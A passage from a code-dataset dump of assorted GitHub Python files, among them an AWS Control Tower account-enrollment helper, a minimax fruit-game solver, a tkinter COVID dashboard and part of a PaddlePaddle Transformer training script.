'channel{0:04d}.txt'.format(n)\n print(label[n])\n\n NPfsample = 1\n NPtime = np.asarray(range(0, NPData.shape[0])) # take unit time steps\n\n TXLdata = {\n 'np_timeseries': NPData,\n 'label': label,\n 'time': NPtime,\n 'fsample': NPfsample}\n\n return TXLdata\n","repo_name":"pmediano/IDTxl","sub_path":"idtxl/matarray2idtxl.py","file_name":"matarray2idtxl.py","file_ext":"py","file_size_in_byte":4106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"91"} +{"seq_id":"6033793426","text":"import logging\nfrom contextlib import asynccontextmanager\nfrom config import Config\n\nlogger = logging.getLogger(\"uvicorn\")\n\n\n@asynccontextmanager\nasync def lifespan(app):\n on_startup(app)\n yield\n on_shutdown(app)\n\n\ndef on_startup(app):\n logger.info(f\"Documentation can be found at the {app.docs_url} \" f\"or {app.redoc_url} endpoints.\")\n logger.info(\"Using the following queue configuation:\")\n logger.info(f\"Queue name: {Config.QUEUE_NAME}\")\n logger.info(f\"Queue URL: {Config.QUEUE_URL}\")\n\n\ndef on_shutdown(app):\n logger.info(f\"{app.title} has shutdown\")\n","repo_name":"ministryofjustice/laa_govuk_notify_orchestrator","sub_path":"app/lifespan.py","file_name":"lifespan.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"34843518570","text":"import re\nwith open(\"432\", 'r') as f:\n content = f.read()\n\nmatch1 = re.findall(\"Text:(.*)[\\n]\", content)\nmatch2 = re.findall('Type:(.*)[\\n]', content)\nmatch3 = re.findall('Origin:(.*)[\\n]', content)\nmatch4 = re.findall('ID:(.*)[\\n]', content)\nmatch5 = re.findall('Hashtags:(.*)[\\n]', content)\nmatch6 = 
re.findall('Time:(.*)[\\n]', content)\nmatch7 = re.findall('MentionedEntities:(.*)[\\n]', content)\n#match8 = match1.append(match4)\nfopen = open(\"output.txt\",'w')\nfopen.write(str(match1))\nfopen.close()\n\n#print(match1,\"\\n\\n\")\n","repo_name":"AlfredSkaria/Hashtag-recommendation","sub_path":"main project/sample_input/work.py","file_name":"work.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"} +{"seq_id":"22790481307","text":"import boto3, botocore\nimport logging\nimport json\n\n\nclass EnrollAWSAccount:\n    def __init__(self, aws_account_id: str, assume_role_name: str):\n        self.control_tower_role_name = \"AWSControlTowerExecution\"\n        self.control_tower_permissions_policy = \"arn:aws:iam::aws:policy/AdministratorAccess\"\n        self.management_account_id = \"\"\n        self.aws_account_id = aws_account_id\n        self.assume_role_name = assume_role_name\n\n    def get_boto_session(self) -> boto3.Session:\n        current_aws_account = boto3.client(\"sts\").get_caller_identity()[\"Account\"]\n        if current_aws_account == self.aws_account_id:\n            return boto3.Session()\n        logging.warning(\n            f\"Not in correct account, will use {self.assume_role_name} to assume access into {self.aws_account_id}\"\n        )\n        self.management_account_id = current_aws_account\n        return self.assume_role_in_destination_account()\n\n    def assume_role_in_destination_account(self) -> boto3.Session:\n        sts_client = boto3.client(\"sts\")\n        destination_session = sts_client.assume_role(\n            RoleArn=f\"arn:aws:iam::{self.aws_account_id}:role/{self.assume_role_name}\",\n            RoleSessionName=\"control-tower-enrollment\",\n        )\n        return boto3.Session(\n            aws_access_key_id=destination_session[\"Credentials\"][\"AccessKeyId\"],\n            aws_secret_access_key=destination_session[\"Credentials\"][\"SecretAccessKey\"],\n            aws_session_token=destination_session[\"Credentials\"][\"SessionToken\"],\n        )\n\n    def attach_policy(self):\n        self.iam_client.attach_role_policy(\n            RoleName=self.control_tower_role_name, PolicyArn=self.control_tower_permissions_policy\n        )\n\n    def get_iam_client(self):\n        boto_session = self.get_boto_session()\n        return boto_session.client(\"iam\")\n\n    def create_role(self, human_supplied_management_account_id: str = \"\"):\n        management_account_id = self.management_account_id or human_supplied_management_account_id\n\n        self.iam_client = self.get_iam_client()\n\n        # https://docs.aws.amazon.com/en_us/controltower/latest/userguide/enroll-manually.html\n        try:\n            self.iam_client.create_role(\n                RoleName=self.control_tower_role_name,\n                AssumeRolePolicyDocument=json.dumps(\n                    {\n                        \"Version\": \"2012-10-17\",\n                        \"Statement\": [\n                            {\n                                \"Effect\": \"Allow\",\n                                \"Principal\": {\"AWS\": f\"arn:aws:iam::{management_account_id}:root\"},\n                                \"Action\": \"sts:AssumeRole\",\n                                \"Condition\": {},\n                            }\n                        ],\n                    }\n                ),\n            )\n        except self.iam_client.exceptions.EntityAlreadyExistsException:\n            # boto3 raises a modelled exception here; the original compared the raw\n            # error code against the exception class name, which never matches\n            logging.warning(\"Role already created\")\n\n        logging.info(\"Attaching policy to role\")\n        self.attach_policy()\n","repo_name":"keit-labs/control-tower-helpers","sub_path":"modules/enroll.py","file_name":"enroll.py","file_ext":"py","file_size_in_byte":3108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"8988352226","text":"# List initialization \nlist_string = ['21', '1', '131', '12', '15'] \n \n# mapping \nlist_map = map(int, list_string) \n \n# sorting list \nlist_sorted = sorted(list_map) \n \n# 
Printing sorted list of integers \nprint(list_sorted) ","repo_name":"AjayYadavAi/python-programs","sub_path":"new_cchek.py","file_name":"new_cchek.py","file_ext":"py","file_size_in_byte":226,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"90"} +{"seq_id":"22199154731","text":"class Mat:\n def __init__ (self,a,b,c,d):\n self.a = a\n self.b = b\n self.c = c\n self.d = d\n\n def p (self,y):\n return Mat(self.a + y.a, self.b + y.b, self.c + y.c, self.d + y.d)\n \n def m (self,y):\n return Mat(self.a - y.a, self.b - y.b, self.c - y.c, self.d - y.d)\n \n def mult (self,const):\n return Mat(self.a * const, self.b * const, self.c * const, self.d * const)\n \n def Mult (self, mat):\n q = self.a * mat.a + self.b * mat.c\n w = self.a * mat.b + self.b * mat.d\n e = self.c * mat.a + self.d * mat.c\n r = self.c * mat.b + self.d * mat.d\n return Mat(q,w,e,r)\n \n def pr(x):\n print(x.a,x.b)\n print(x.c,x.d)\n \n def T(x):\n x.b += x.c\n x.c = x.b - x.c\n x.b = x.b - x.c\n def det(a):\n return a.a * a.d - a.c * a.b\n \nx = Mat(1,0,0,1)\ny = Mat(7,7,3,7)\nz =x.p(y)\nz.T()\nz=z.mult(10)\nz.pr()\nz=z.Mult(x)\nz.pr()\nz=z.Mult(z)\nz.pr()\nz.T()\nz.pr()\nz.T()\nz.pr()\nprint(z.det())\nprint((z.Mult(z)).det())\n","repo_name":"AlekseevYuri/13-605","sub_path":"sem1/mat_2_r.py","file_name":"mat_2_r.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"90"} +{"seq_id":"10505864766","text":"import sys\nimport copy\nimport numpy as np\nimport time\nfrom datetime import datetime\nimport copy\n\n\ndef applyGravity(gridArray):\n for j in range(0, sizeOfGrid):\n copyArray = gridArray[:, j]\n for k in range(0, sizeOfGrid):\n if (copyArray[k] == '*'):\n copyArray = np.delete(copyArray, k)\n copyArray = np.insert(copyArray, 0, '*')\n gridArray[:, j] = copyArray\n return gridArray\n\n\ndef isInBound(x, y):\n if (x >= 0 and y >= 0 and x < sizeOfGrid and y < sizeOfGrid):\n return True\n return False\n\n\ndef checkRegions(x, y, grid, number, dontGo, region, gridCheck):\n if (isInBound(x, y)):\n if (gridCheck[x][y] == False):\n if (grid[x][y] == number):\n region.append((x, y))\n gridCheck[x][y] = True\n if (dontGo != 'u'):\n checkRegions(x - 1, y, grid, number, 'd', region, gridCheck)\n if (dontGo != 'd'):\n checkRegions(x + 1, y, grid, number, 'u', region, gridCheck)\n if (dontGo != 'r'):\n checkRegions(x, y + 1, grid, number, 'l', region, gridCheck)\n if (dontGo != 'l'):\n checkRegions(x, y - 1, grid, number, 'r', region, gridCheck)\n\n\ndef popRegion(gridSent, region):\n grid = gridSent.copy()\n for j, k in region:\n grid[j][k] = '*'\n applyGravity(grid)\n return grid\n\n\nclass Node:\n gridArray = []\n children = []\n myScore = 0\n opScore = 0\n starCount = 0\n\n def __init__(self, gridPassed, stars, myScorePassed=0, opScorePassed=0, popped=None):\n self.gridArray = gridPassed.copy()\n self.children = []\n self.myScore = myScorePassed\n self.opScore = opScorePassed\n self.value = 0\n self.starCount = stars\n self.popped = popped\n self.calledFunction = 0\n\n\ndef alphaBetaMax(node, alpha, beta, depthLimit):\n #alphaBetaMax.counter = alphaBetaMax.counter + 1\n if depthLimit < 0 or node.starCount >= maximumStars:\n node.value = node.myScore - node.opScore\n else:\n node.value = - sys.maxsize\n regions = []\n gridCheck = np.zeros((sizeOfGrid, sizeOfGrid), dtype=bool)\n for i in range(0, sizeOfGrid):\n for j in range(0, sizeOfGrid):\n # If not already part of a region.\n if (gridCheck[i][j] == 
False):\n\n                    # Make part of region\n                    gridCheck[i][j] = True\n\n                    # Check if element is '*', if yes, skip.\n                    if (node.gridArray[i][j] != '*'):\n                        # Create a new region and add this index to it.\n                        region = []\n                        region.append((i, j))\n\n                        # Get the fruit at that location.\n                        fruit = node.gridArray[i][j]\n\n                        # Check for an existing region for this fruit on the right.\n                        checkRegions(i, j + 1, node.gridArray, fruit, 'l', region, gridCheck)\n                        # Check for an existing region for this fruit below.\n                        checkRegions(i + 1, j, node.gridArray, fruit, 'u', region, gridCheck)\n\n                        # Add this newly detected region into the list of regions for this node.\n                        regions.append(region)\n        sortRegions(regions)\n        for region in regions:\n\n            # Update the score to the right measure if this region is popped.\n            myScore = node.myScore\n            opScore = node.opScore\n\n            gridChild = copy.deepcopy(popRegion(node.gridArray, region))\n\n            myScore = myScore + np.square(region.__len__())\n            stars = node.starCount + region.__len__()\n\n            # Create a new child node and add it to the children of this node.\n            childNode = Node(gridChild, stars, myScore, opScore, (chr(64 + 1 + region[0][1]), region[0][0] + 1))\n\n            node.value = max(node.value, alphaBetaMin(childNode, alpha, beta, depthLimit - 1))\n            node.calledFunction += 1\n            if (node.value >= beta):\n                return node.value\n            alpha = max(alpha, node.value)\n\n            node.children.append(childNode)\n\n        # Terminal Test\n        if (regions.__len__() == 0):\n            node.value = node.myScore - node.opScore\n\n    return node.value\n\n\ndef alphaBetaMin(node, alpha, beta, depthLimit):\n    #alphaBetaMin.counter = alphaBetaMin.counter + 1\n    if depthLimit < 0 or node.starCount >= maximumStars:  # >= matches alphaBetaMax; a pop can overshoot the star cap\n        node.value = node.myScore - node.opScore\n    else:\n        node.value = sys.maxsize\n        count = 0\n        regions = []\n        # ti1 = datetime.now()\n\n        gridCheck = np.zeros((sizeOfGrid, sizeOfGrid), dtype=bool)\n        for i in range(0, sizeOfGrid):\n            for j in range(0, sizeOfGrid):\n                # If not already part of a region.\n                if (gridCheck[i][j] == False):\n\n                    # Make part of region\n                    gridCheck[i][j] = True\n\n                    # Check if element is '*', if yes, skip.\n                    if (node.gridArray[i][j] != '*'):\n                        # Create a new region and add this index to it.\n                        region = []\n                        region.append((i, j))\n\n                        # Get the fruit at that location.\n                        fruit = node.gridArray[i][j]\n\n                        # Check for an existing region for this fruit on the right.\n                        checkRegions(i, j + 1, node.gridArray, fruit, 'l', region, gridCheck)\n                        # Check for an existing region for this fruit below.\n                        checkRegions(i + 1, j, node.gridArray, fruit, 'u', region, gridCheck)\n\n                        # Add this newly detected region into the list of regions for this node.\n                        regions.append(region)\n        sortRegions(regions)\n        for region in regions:\n            # Update the score to the right measure if this region is popped.\n            myScore = node.myScore\n            opScore = node.opScore\n\n            gridChild = popRegion(node.gridArray, region)\n\n            opScore = opScore + np.square(region.__len__())\n\n            stars = node.starCount + region.__len__()\n\n            count += 1\n\n            # Create a new child node and add it to the children of this node.\n            # Use the region's first cell, as in alphaBetaMax; i and j here are stale loop variables.\n            childNode = Node(gridChild, stars, myScore, opScore, (chr(64 + 1 + region[0][1]), region[0][0] + 1))\n            node.value = min(node.value, alphaBetaMax(childNode, alpha, beta, depthLimit - 1))\n            node.calledFunction += 1\n\n            if (node.value <= alpha):\n                return node.value\n            beta = min(beta, node.value)\n\n            node.children.append(childNode)\n        # ti2 = datetime.now()\n\n        # print('Time for generating ', count,' children: ', ti2-ti1,' at depth ', depthLimit)\n\n        # Terminal Test\n        if (regions.__len__() == 0):\n            node.value = 
node.myScore - node.opScore\n\n return node.value\n\n\ndef sortRegions(listToSort):\n if len(listToSort) > 1:\n centerIndex = len(listToSort) // 2\n regionsLeft = listToSort[:centerIndex]\n regionsRight = listToSort[centerIndex:]\n\n sortRegions(regionsLeft)\n sortRegions(regionsRight)\n\n one = 0\n two = 0\n three = 0\n while one < len(regionsLeft) and two < len(regionsRight):\n if regionsLeft[one].__len__() > regionsRight[two].__len__():\n listToSort[three] = regionsLeft[one]\n one = one + 1\n else:\n listToSort[three] = regionsRight[two]\n two = two + 1\n three = three + 1\n\n while one < len(regionsLeft):\n listToSort[three] = regionsLeft[one]\n one = one + 1\n three = three + 1\n\n while two < len(regionsRight):\n listToSort[three] = regionsRight[two]\n two = two + 1\n three = three + 1\n\n\n\n\n# Start reading from file\nfileVar = open('input.txt', 'r')\nalphaBetaMin.counter = 0\nalphaBetaMax.counter = 0\ndepth = 1\n\nsizeOfGrid = int(fileVar.readline())\nprint(sizeOfGrid)\ntypesOfFruit = int(fileVar.readline())\nprint(typesOfFruit)\ntimeToRun = (fileVar.readline())\nprint(timeToRun)\ngrid = []\nif float(timeToRun) < 60:\n depth = 0\nelif(sizeOfGrid<=7 and float(timeToRun) > 150):\n depth =3\nelif sizeOfGrid >= 10 and float(timeToRun) < 150:\n depth = 0\n\nprint('Depth: ', depth)\nfor j in range(0, sizeOfGrid):\n grid.append(list(fileVar.readline())[:sizeOfGrid])\n\ngrid = np.array(grid)\ngridCheck = np.full((sizeOfGrid, sizeOfGrid), False, dtype=bool)\n# print(grid)\n\n# Start detecting regions\nregions = []\n\nt1 = datetime.now()\nstars = 0\nfor i in range(0, sizeOfGrid):\n for j in range(0, sizeOfGrid):\n # print((i,j))\n if grid[i][j] == '*':\n stars = stars + 1\n\nmaximumStars = np.square(sizeOfGrid)\nnode = Node(grid, stars)\n\nfinalValue = alphaBetaMax(node, -sys.maxsize, sys.maxsize, depth)\n\nselectedMove = None\nfor i in range(0, node.children.__len__()):\n if (node.children[i].value == finalValue):\n selectedMove = node.children[i]\n break\n#if selectedMove != None:\n# print(selectedMove.gridArray)\nt2 = datetime.now()\n\nprint(t2 - t1)\n\ntotalCount = alphaBetaMin.counter + alphaBetaMax.counter\nprint(totalCount)\nprint('Outputting.')\noutput = open('output.txt', 'w')\noutput.write(selectedMove.popped[0] + selectedMove.popped[1].__str__() + '\\n')\nfor s in range(0, sizeOfGrid):\n for p in range(0, sizeOfGrid):\n output.write(selectedMove.gridArray[s][p])\n output.write('\\n')\noutput.close()\n","repo_name":"itstaby/Minimax-Fruit-Rage","sub_path":"homework3.py","file_name":"homework3.py","file_ext":"py","file_size_in_byte":9672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"18583770679","text":"import sys\ninput = lambda: sys.stdin.readline().rstrip()\n\ndef main():\n a, b, c, d = map(int, input().split())\n left = a + b\n right = c + d\n if left > right:\n print('Left')\n elif left < right:\n print('Right')\n else:\n print('Balanced')\n\nif __name__ == '__main__':\n main()","repo_name":"Aasthaengg/IBMdataset","sub_path":"Python_codes/p03477/s781309668.py","file_name":"s781309668.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"42929785145","text":"from tkinter import *\nfrom apps.api_covid import Apis\nfrom apps.frames_app import send_frame_infecteds, send_frame_recovereds, send_frame_deads\n\n#######colors\nc0 = \"#000000\" # black\nc1 = \"#cc1d4e\" # red\nc2 = \"#feffff\" # white\nc3 = \"#0074eb\" # 
blue\nc4 = \"#435e5a\"    # #435e5a\nc5 = \"#59b356\"  # green\nc6 = \"#d9d9d9\"  # grey\n#######\n\nfrom tkinter import ttk  # ttk is not pulled in by \"from tkinter import *\"\n\n\nclass Window:\n\n    def __init__(self):\n        self.window = Tk()\n        self.window.title('')\n        self.window.resizable(width=FALSE, height=FALSE)\n        self.window.geometry('835x360')\n        self.window.configure(background=c6)\n        self.get_frames()\n        self.labelCountry()\n\n    def get_frames(self):\n        #red division frame\n        self.app_cov_frame = Frame(self.window, width=840, height=50, background=c1, relief=\"flat\")\n        self.app_cov_frame.grid(row=0, column=0, columnspan=3, sticky=NSEW)\n\n        #covid infected frame\n        self.send_frame_infected = Frame(self.window, width=220, height=100, background=c2, relief=\"flat\")\n        self.send_frame_infected.grid(row=1, column=0, sticky=NW, pady=5, padx=5)\n\n        #covid recovered frame\n        self.send_frame_recovered = Frame(self.window, width=220, height=100, background=c2, relief=\"flat\")\n        self.send_frame_recovered.grid(row=1, column=1, sticky=NW, pady=5, padx=5)\n\n        #frame of dead by covid\n        self.send_frame_deaths = Frame(self.window, width=220, height=100, background=c2, relief=\"flat\")\n        self.send_frame_deaths.grid(row=1, column=2, sticky=NW, pady=5, padx=5)\n\n        #country selection frame\n        self.select_frame = Frame(self.window, width=840, height=50, background=c6, relief=\"flat\")\n        self.select_frame.grid(row=2, column=0, columnspan=3, sticky=N, pady=10)\n\n    def labelCountry(self):\n        label_country = Label(self.select_frame, text=\"Select Country:\", width=13, height=1, pady=7, padx=0,\n                              relief=\"flat\", anchor=NW, font=(\"Ivy 10 bold\"), background=c6, fg=c0)\n        label_country.grid(row=0, column=0, pady=1, padx=13)\n\n        country = [\"Global\", \"Brazil\", \"Portugal\", \"USA\", \"France\", \"Spain\",\n                   \"China\", \"Japan\", \"Switzerland\", \"Germany\", \"Italy\", \"Belgium\", \"Angola\"]\n\n        self.sel = ttk.Combobox(self.select_frame, width=15, font=(\"Ivy 8 bold\"))\n        self.sel[\"values\"] = country\n        self.sel.grid(row=0, column=1, padx=0, pady=13)\n\n\nwindow = Window()\n\n# the original bound an undefined \"selects\" callback; re-enable once it exists:\n# window.sel.bind(\"<<ComboboxSelected>>\", selects)\nwindow.window.mainloop()\n","repo_name":"Vogel1212/covid-19-application","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"90"} +{"seq_id":"21017935535","text":"import os\n\nfrom creational.factory_method.creator import ParserCreator\nfrom creational.factory_method.concrate_creator_one import YAMLParserCreator\nfrom creational.factory_method.concrate_creator_two import JSONParserCreator\n\nFILES_PATH = './data'\n\n\ndef client_code(parser: ParserCreator, file_to_parse: str) -> None:\n    \"\"\"\n    The client code works with an instance of a concrete creator, albeit through\n    its base interface. 
As long as the client keeps working with the creator via\n the base interface, you can pass it any creator's subclass.\n \"\"\"\n\n print(f\"{parser.parse(file_to_parse)}\")\n\n\nif __name__ == \"__main__\":\n files = [\n os.path.normpath(\n os.path.join(FILES_PATH, d)\n ) for d in os.listdir(os.path.abspath(FILES_PATH))\n ]\n\n for file in files:\n if file.endswith('.json'):\n print(\"App: Launched with the JSONParserCreator.\")\n client_code(JSONParserCreator(), file)\n if file.endswith('.yaml'):\n print(\"App: Launched with the YAMLParserCreator.\")\n client_code(YAMLParserCreator(), file)\n","repo_name":"OmriGilhar/design-patterns-py","sub_path":"creational/factory_method/client_side.py","file_name":"client_side.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"20903935952","text":"import argparse\nimport ast\nimport copy\nimport logging\nimport multiprocessing\nimport os\nimport six\nimport sys\nimport time\n\nimport numpy as np\nimport paddle.fluid as fluid\n\nimport reader\nfrom config import *\nfrom desc import *\nfrom model import transformer, position_encoding_init\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(\"Training for Transformer.\")\n parser.add_argument(\n \"--src_vocab_fpath\",\n type=str,\n required=True,\n help=\"The path of vocabulary file of source language.\")\n parser.add_argument(\n \"--trg_vocab_fpath\",\n type=str,\n required=True,\n help=\"The path of vocabulary file of target language.\")\n parser.add_argument(\n \"--phoneme_vocab_fpath\",\n type=str,\n required=True,\n help=\"The path of vocabulary file of phonemes.\")\n parser.add_argument(\n \"--lexicon_fpath\",\n type=str,\n required=True,\n help=\"The path of lexicon of source language.\")\n parser.add_argument(\n \"--train_file_pattern\",\n type=str,\n required=True,\n help=\"The pattern to match training data files.\")\n parser.add_argument(\n \"--val_file_pattern\",\n type=str,\n help=\"The pattern to match validation data files.\")\n parser.add_argument(\n \"--use_token_batch\",\n type=ast.literal_eval,\n default=True,\n help=\"The flag indicating whether to \"\n \"produce batch data according to token number.\")\n parser.add_argument(\n \"--batch_size\",\n type=int,\n default=4096,\n help=\"The number of sequences contained in a mini-batch, or the maximum \"\n \"number of tokens (include paddings) contained in a mini-batch. 
Note \"\n \"that this represents the number on single device and the actual batch \"\n \"size for multi-devices will multiply the device number.\")\n parser.add_argument(\n \"--pool_size\",\n type=int,\n default=200000,\n help=\"The buffer size to pool data.\")\n parser.add_argument(\n \"--sort_type\",\n default=\"pool\",\n choices=(\"global\", \"pool\", \"none\"),\n help=\"The grain to sort by length: global for all instances; pool for \"\n \"instances in pool; none for no sort.\")\n parser.add_argument(\n \"--shuffle\",\n type=ast.literal_eval,\n default=True,\n help=\"The flag indicating whether to shuffle instances in each pass.\")\n parser.add_argument(\n \"--shuffle_batch\",\n type=ast.literal_eval,\n default=True,\n help=\"The flag indicating whether to shuffle the data batches.\")\n parser.add_argument(\n \"--special_token\",\n type=str,\n default=[\"\", \"\", \"\"],\n nargs=3,\n help=\"The , and tokens in the dictionary.\")\n parser.add_argument(\n \"--token_delimiter\",\n type=lambda x: str(x.encode().decode(\"unicode-escape\")),\n default=\" \",\n help=\"The delimiter used to split tokens in source or target sentences. \"\n \"For EN-DE BPE data we provided, use spaces as token delimiter. \")\n parser.add_argument(\n 'opts',\n help='See config.py for all options',\n default=None,\n nargs=argparse.REMAINDER)\n parser.add_argument(\n '--local',\n type=ast.literal_eval,\n default=True,\n help='Whether to run as local mode.')\n parser.add_argument(\n '--device',\n type=str,\n default='GPU',\n choices=['CPU', 'GPU'],\n help=\"The device type.\")\n parser.add_argument(\n '--update_method',\n choices=(\"pserver\", \"nccl2\"),\n default=\"pserver\",\n help='Update method.')\n parser.add_argument(\n '--sync', type=ast.literal_eval, default=True, help=\"sync mode.\")\n parser.add_argument(\n \"--enable_ce\",\n type=ast.literal_eval,\n default=False,\n help=\"The flag indicating whether to run the task \"\n \"for continuous evaluation.\")\n parser.add_argument(\n \"--use_py_reader\",\n type=ast.literal_eval,\n default=True,\n help=\"The flag indicating whether to use py_reader.\")\n parser.add_argument(\n \"--fetch_steps\",\n type=int,\n default=100,\n help=\"The frequency to fetch and print output.\")\n\n args = parser.parse_args()\n # Append args related to dict\n src_dict = reader.DataReader.load_dict(args.src_vocab_fpath)\n trg_dict = reader.DataReader.load_dict(args.trg_vocab_fpath)\n phone_dict = reader.DataReader.load_dict(args.phoneme_vocab_fpath)\n dict_args = [\n \"src_vocab_size\", str(len(src_dict)), \"trg_vocab_size\",\n str(len(trg_dict)), \"phone_vocab_size\", str(len(phone_dict)), \"bos_idx\",\n str(src_dict[args.special_token[0]]), \"eos_idx\",\n str(src_dict[args.special_token[1]]), \"unk_idx\",\n str(src_dict[args.special_token[2]])\n ]\n merge_cfg_from_list(args.opts + dict_args,\n [TrainTaskConfig, ModelHyperParams])\n\n return args\n\n\ndef append_nccl2_prepare(startup_prog, trainer_id, worker_endpoints,\n current_endpoint):\n assert (trainer_id >= 0 and len(worker_endpoints) > 1 and\n current_endpoint in worker_endpoints)\n eps = copy.deepcopy(worker_endpoints)\n eps.remove(current_endpoint)\n nccl_id_var = startup_prog.global_block().create_var(\n name=\"NCCLID\", persistable=True, type=fluid.core.VarDesc.VarType.RAW)\n startup_prog.global_block().append_op(\n type=\"gen_nccl_id\",\n inputs={},\n outputs={\"NCCLID\": nccl_id_var},\n attrs={\n \"endpoint\": current_endpoint,\n \"endpoint_list\": eps,\n \"trainer_id\": trainer_id\n })\n return nccl_id_var\n\n\ndef 
pad_phoneme_data(phoneme_seqs, pad_idx, max_seq_len):\n \"\"\"\n Pad the instances to the max sequence length in batch, and generate the\n corresponding position data and attention bias.\n \"\"\"\n ph_seq_lens = []\n for ps in phoneme_seqs:\n cur_seq_lens = [len(x) for x in ps]\n ph_seq_lens.append(max(cur_seq_lens))\n max_ph_seq_len = max(ph_seq_lens)\n\n batch_size = len(phoneme_seqs)\n phoneme_data = pad_idx * np.ones(\n (batch_size, max_seq_len, max_ph_seq_len), dtype=np.int64)\n phoneme_mask = np.zeros(\n (batch_size, max_seq_len, max_ph_seq_len), dtype=np.int64)\n\n for i in range(batch_size):\n cur_ph_seq = phoneme_seqs[i]\n for j, cur_word_phs in enumerate(cur_ph_seq):\n word_phs_len = len(cur_word_phs)\n phoneme_data[i, j, :word_phs_len] = cur_word_phs\n phoneme_mask[i, j, :word_phs_len] = 1\n\n phoneme_data = np.reshape(phoneme_data, [batch_size, max_seq_len, -1, 1])\n\n return phoneme_data, phoneme_mask, max_ph_seq_len\n\n\ndef pad_batch_data(insts,\n pad_idx,\n n_head,\n is_target=False,\n is_label=False,\n return_attn_bias=True,\n return_max_len=True,\n return_num_token=False):\n \"\"\"\n Pad the instances to the max sequence length in batch, and generate the\n corresponding position data and attention bias.\n \"\"\"\n return_list = []\n max_len = max(len(inst) for inst in insts)\n # Any token included in dict can be used to pad, since the paddings' loss\n # will be masked out by weights and make no effect on parameter gradients.\n inst_data = np.array(\n [inst + [pad_idx] * (max_len - len(inst)) for inst in insts])\n return_list += [inst_data.astype(\"int64\").reshape([-1, 1])]\n if is_label: # label weight\n inst_weight = np.array([[1.] * len(inst) + [0.] * (max_len - len(inst))\n for inst in insts])\n return_list += [inst_weight.astype(\"float32\").reshape([-1, 1])]\n else: # position data\n inst_pos = np.array([\n list(range(0, len(inst))) + [0] * (max_len - len(inst))\n for inst in insts\n ])\n return_list += [inst_pos.astype(\"int64\").reshape([-1, 1])]\n if return_attn_bias:\n if is_target:\n # This is used to avoid attention on paddings and subsequent\n # words.\n slf_attn_bias_data = np.ones((inst_data.shape[0], max_len, max_len))\n slf_attn_bias_data = np.triu(slf_attn_bias_data,\n 1).reshape([-1, 1, max_len, max_len])\n slf_attn_bias_data = np.tile(slf_attn_bias_data,\n [1, n_head, 1, 1]) * [-1e9]\n else:\n # This is used to avoid attention on paddings.\n slf_attn_bias_data = np.array([[0] * len(inst) + [-1e9] *\n (max_len - len(inst))\n for inst in insts])\n slf_attn_bias_data = np.tile(\n slf_attn_bias_data.reshape([-1, 1, 1, max_len]),\n [1, n_head, max_len, 1])\n return_list += [slf_attn_bias_data.astype(\"float32\")]\n if return_max_len:\n return_list += [max_len]\n if return_num_token:\n num_token = 0\n for inst in insts:\n num_token += len(inst)\n return_list += [num_token]\n return return_list if len(return_list) > 1 else return_list[0]\n\n\ndef prepare_batch_input(insts, data_input_names, src_pad_idx, phone_pad_idx,\n trg_pad_idx, n_head, d_model):\n \"\"\"\n Put all padded data needed by training into a dict.\n \"\"\"\n src_word, src_pos, src_slf_attn_bias, src_max_len = pad_batch_data(\n [inst[0] for inst in insts], src_pad_idx, n_head, is_target=False)\n src_word = src_word.reshape(-1, src_max_len, 1)\n src_pos = src_pos.reshape(-1, src_max_len, 1)\n src_phone, src_phone_mask, max_phone_len = pad_phoneme_data(\n [inst[1] for inst in insts], phone_pad_idx, src_max_len)\n trg_word, trg_pos, trg_slf_attn_bias, trg_max_len = pad_batch_data(\n [inst[2] for 
inst in insts], trg_pad_idx, n_head, is_target=True)\n trg_word = trg_word.reshape(-1, trg_max_len, 1)\n trg_pos = trg_pos.reshape(-1, trg_max_len, 1)\n\n trg_src_attn_bias = np.tile(src_slf_attn_bias[:, :, ::src_max_len, :],\n [1, 1, trg_max_len, 1]).astype(\"float32\")\n\n lbl_word, lbl_weight, num_token = pad_batch_data(\n [inst[3] for inst in insts],\n trg_pad_idx,\n n_head,\n is_target=False,\n is_label=True,\n return_attn_bias=False,\n return_max_len=False,\n return_num_token=True)\n\n data_input_dict = dict(\n zip(data_input_names, [\n src_word, src_pos, src_slf_attn_bias, src_phone, src_phone_mask,\n trg_word, trg_pos, trg_slf_attn_bias, trg_src_attn_bias, lbl_word,\n lbl_weight\n ]))\n\n return data_input_dict, np.asarray([num_token], dtype=\"float32\")\n\n\ndef prepare_data_generator(args,\n is_test,\n count,\n pyreader,\n py_reader_provider_wrapper,\n place=None):\n \"\"\"\n Data generator wrapper for DataReader. If use py_reader, set the data\n provider for py_reader\n \"\"\"\n data_reader = reader.DataReader(\n phoneme_vocab_fpath=args.phoneme_vocab_fpath,\n lexicon_fpath=args.lexicon_fpath,\n fpattern=args.val_file_pattern if is_test else args.train_file_pattern,\n src_vocab_fpath=args.src_vocab_fpath,\n trg_vocab_fpath=args.trg_vocab_fpath,\n token_delimiter=args.token_delimiter,\n use_token_batch=args.use_token_batch,\n batch_size=args.batch_size * (1 if args.use_token_batch else count),\n pool_size=args.pool_size,\n sort_type=args.sort_type,\n shuffle=args.shuffle,\n shuffle_batch=args.shuffle_batch,\n start_mark=args.special_token[0],\n end_mark=args.special_token[1],\n unk_mark=args.special_token[2],\n # count start and end tokens out\n max_length=ModelHyperParams.max_length - 2,\n clip_last_batch=False).batch_generator\n\n def stack(data_reader, count, clip_last=True):\n def __impl__():\n res = []\n for item in data_reader():\n res.append(item)\n if len(res) == count:\n yield res\n res = []\n if len(res) == count:\n yield res\n elif not clip_last:\n data = []\n for item in res:\n data += item\n if 